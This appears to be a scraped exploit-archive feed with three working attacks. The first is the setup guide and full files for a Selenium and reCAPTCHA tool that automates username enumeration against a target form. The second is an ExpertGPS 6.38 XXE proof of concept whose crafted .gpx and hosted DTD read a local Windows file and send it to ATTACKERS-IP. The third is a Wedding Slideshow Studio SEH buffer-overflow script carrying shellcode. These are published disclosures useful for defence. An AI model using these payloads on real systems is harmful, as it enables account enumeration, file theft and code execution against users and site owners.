2. Download Gecko Driver located at https://github.com/mozilla/geckodriver/releases and ensure the binary is in your path. For *nux just copy the file to /usr/bin
```
user@linux:~$ sudo cp geckodriver /usr/bin/geckodriver
```
3. To use this exploit, you need to install python3, pip3 and install the additional requirements that are in the requirements.txt file.
```
user@linux:~$ sudo apt install python3 python3-pip -y
```
4. Now install the prerequisistes
```
user@linux:~$ pip3 install -r requirements.txt
```
--------------------------------------------------------------------------------------------
USAGE:
--------------------------------------------------------------------------------------------
1. Obtain the site key from the target web application. There should be JavaScript that looks like the following - use the inspect element function to view it, there are two locations you can grab the site key:
```
<script src="https://www.google.com/recaptcha/api.js?render=<SITE-KEY-HERE>"></script>
<script>
grecaptcha.ready(function() {
grecaptcha.execute('<SITE-KEY-HERE>', {action:'validate_captcha'})
.then(function(token) {
// add token value to form
document.getElementById('g-recaptcha-response').value = token;
});
});
</script>
```
2. Open the index.html file and paste the Site Key into the appropriate locations.
3. This next part is where it gets a little tricky. You need to replicate the form you are attacking and change a few things. Firstly in the body of the index.html file. Ensure you are using the appropriate method "GET" or "POST" and you are submitting it to the correct destination.
```
<body>
<form id="form_id" method="<METHOD GOES HERE>" action="<VICTIM FORM SUBMISSION LINK>"
<input type="hidden" id="g-recaptcha-response" name="captcha">
<input id="accName" type="text" name="accountName" value="">
<input id="uName" type="text" name="username" value="">
<input type="submit" value="Submit">
</form>
</body>
```
*For steps 4-6, example code has been provided already, but ensure it matches the site you are targetting. It may be easier to strip it out and follow 4-6 if you are having a difficult time getting it working.*
4. Next you will need to add the following lines to the body of the JavaScript already inside of the <script> tags in the head of the html, after the last line.
```
var url_string = window.location.href;
var url = new URL(url_string);
```
5. After this you need to add the following lines **for each** visible <input> tag in the form you are attacking. This code will automatically take what parameters are provided to the page and set the input elements accordingly.
```
var paramValue1 = url.searchParams.get("accountName");
var account = document.getElementById("accName");
account.value = paramValue1;
```
6. Lastly, add the following lines after you have added JavaScript for each of the <input> tags:
```
var frm = document.getElementById("form_id");
frm.submit();
```
7. Now you need to edit the enumerate.py file to suit your needs. First ensure you change the function to suit the parameters required by your index.html file. In the below example I am trying to enumerate usernames, for an accountname that is the same everytime. Note: You must use "localhost" or a DNS name, using "127.0.0.1" or another IP address will probably not work.
```
accountName = 'testAccount'
def attempt(user):
driver = webdriver.Firefox()
driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')
```
8. Everytime the above function is called, a new Firefox window will be opened, and the link will be called. *If you wish to try and get this working in a headless mode and you succeed, kindly contribute your changes to this repository* This will allow for the JavaScript to be executed to get the needed CAPTCHA which will automatically be forwarded onto the destination. After this create a threaded for loop to suit your needs that iterates through a list, that calls the above function for each attempt:
```
for user in ['user1', 'user2', 'user3']:
thread = threading.Thread(target=attempt, args=(user,))
thread.start()
```
9. You are now ready to run the exploit, in one terminal session start the web server. This will run on localhost on TCP port 8000. You can change these settings by editing the http_serve.py file:
```
user@linux:~$ python3 http_serve.py
```
10. In another terminal session, run the enumerate.py script, and watch it run!
```
user@linux:~$ python3 enumerate.py
```
--------------------------------------------------------------------------------------------
FILES:
--------------------------------------------------------------------------------------------
---- http_serve.py ----
--------------------------------------------------------------------------------------------
#!/usr/bin/python3
import http.server
import socketserver
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("localhost", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
--------------------------------------------------------------------------------------------
---- enumerate.py ----
--------------------------------------------------------------------------------------------
#!/usr/bin/python3
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading
accountName = 'foobar'
def attempt(user):
driver = webdriver.Firefox()
driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')
for user in ['user1', 'user2', 'user3']:
thread = threading.Thread(target=attempt, args=(user,))
thread.start()
--------------------------------------------------------------------------------------------
---- index.html ----
--------------------------------------------------------------------------------------------
<!DOCTYPE html>
<head>
<script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/TYDIjJAqCk6g335bFk3AjlC3/recaptcha__en.js"></script>
<script src="https://www.google.com/recaptcha/api.js?render=<SITE_KEY_GOES_HERE>"></script>
<script>
grecaptcha.ready(function() {
// do request for recaptcha token
// response is promise with passed token
grecaptcha.execute('<SITE_KEY_GOES_HERE>', {action:'validate_captcha'})
.then(function(token) {
// add token value to form
document.getElementById('g-recaptcha-response').value = token;
var url_string = window.location.href;
var url = new URL(url_string);
var paramValue1 = url.searchParams.get("accountName");
var account = document.getElementById("accName");
account.value = paramValue1;
var paramValue2 = url.searchParams.get("username");
var uname = document.getElementById("uName");
uname.value = paramValue2;
var frm = document.getElementById("form_id");
frm.submit();
});
});
</script>
</head>
<body>
<form id="form_id" method="<METHOD>" action="<VICTIM FORM SUBMISSION LINK>">
<input type="hidden" id="g-recaptcha-response" name="captcha">
<input id="accName" type="text" name="accountName" value="">
<input id="uName" type="text" name="username" value="">
<input type="submit" value="Submit">
</form>
</body>
</html>
↧
ExpertGPS 6.38 XML Injection
ExpertGPS version 6.38 suffers from an XML external entity injection vulnerability.
4e1090a6488fa7a932e6937630a5772a[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection
[+] Date: 2019-12-07
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: https://www.topografix.com/
[+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe
[+] Disclosed at: 7FEB2020
[+] Version: 6.38
[+] Tested on: Windows 10
[+] CVE: N/A
==================
Background:
==================
ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format which is based on XML.
==================
Vulnerability:
==================
By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open ExpertGPS.exe
2.)Select File -> Import Data from Other Programs...
3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open".
==================
Proof of Concept:
==================
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)
b.) Hosted "payload.dtd"
<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
c.) Exploited "route.xml"
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
%sp;
%param1;
%exfil;
]>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wptx1="http://www.garmin.com/xmlschemas/WaypointExtension/v1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.topografix.com/GPX/gpx_overlay/0/3 http://www.topografix.com/GPX/gpx_overlay/0/3/gpx_overlay.xsd http://www.topografix.com/GPX/gpx_modified/0/1 http://www.topografix.com/GPX/gpx_modified/0/1/gpx_modified.xsd http://www.topografix.com/GPX/Private/TopoGrafix/0/4 http://www.topografix.com/GPX/Private/TopoGrafix/0/4/topografix.xsd http://www.garmin.com/xmlschemas/WaypointExtension/v1 http://www8.garmin.com/xmlschemas/WaypointExtensionv1.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 http://www.garmin.com/xmlschemas/GpxExtensionsv3.xsd">
<metadata>
<bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/>
<extensions>
<time xmlns="http://www.topografix.com/GPX/gpx_modified/0/1">2019-12-08T03:35:44.731Z</time>
<active_point xmlns="http://www.topografix.com/GPX/Private/TopoGrafix/0/4" lat="38.89767500" lon="-77.03654700">
</active_point>
</extensions>
</metadata>
<wpt lat="38.89767500" lon="-77.03654700">
<time>2019-12-08T03:35:44.732Z</time>
<name>1600PennsylvaniaAvenuenWashingt</name>
<cmt>1600 Pennsylvania Avenue
Washington</cmt>
<desc>1600 Pennsylvania Avenue
Washington, DC 20500</desc>
<sym>City (Small)</sym>
<type>Address</type>
<extensions>
<label xmlns="http://www.topografix.com/GPX/gpx_overlay/0/3">
<label_text>1600 Pennsylvania Avenue
Washington, DC 20500</label_text>
</label>
<gpxx:WaypointExtension>
<gpxx:Address>
<gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress>
<gpxx:City>Washington</gpxx:City>
<gpxx:State>DC</gpxx:State>
<gpxx:Country>United States</gpxx:Country>
<gpxx:PostalCode>20500</gpxx:PostalCode>
</gpxx:Address>
</gpxx:WaypointExtension>
<wptx1:WaypointExtension>
<wptx1:Address>
<wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress>
<wptx1:City>Washington</wptx1:City>
<wptx1:State>DC</wptx1:State>
<wptx1:Country>United States</wptx1:Country>
<wptx1:PostalCode>20500</wptx1:PostalCode>
</wptx1:Address>
</wptx1:WaypointExtension>
</extensions>
</wpt>
<extensions>
</extensions>
</gpx>
==================
Additional Attack Vectors:
==================
There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.
↧
Wedding Slideshow Studio 1.36 Buffer Overflow
Wedding Slideshow Studio version 1.36 suffers from a buffer overflow vulnerability.
7d61e1ee75320bf8d949aaa53ba8ea59#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-09
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "poc.txt".
#2. Just copy the text inside "poc.txt".
#3. Start the program. In the new window click "Help"> "Register ...
#4. Now paste the content of "poc.txt" into the field: "Registration Key"> Click "Ok"
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10023b8a)
#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode
try:
f=open("poc.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
↧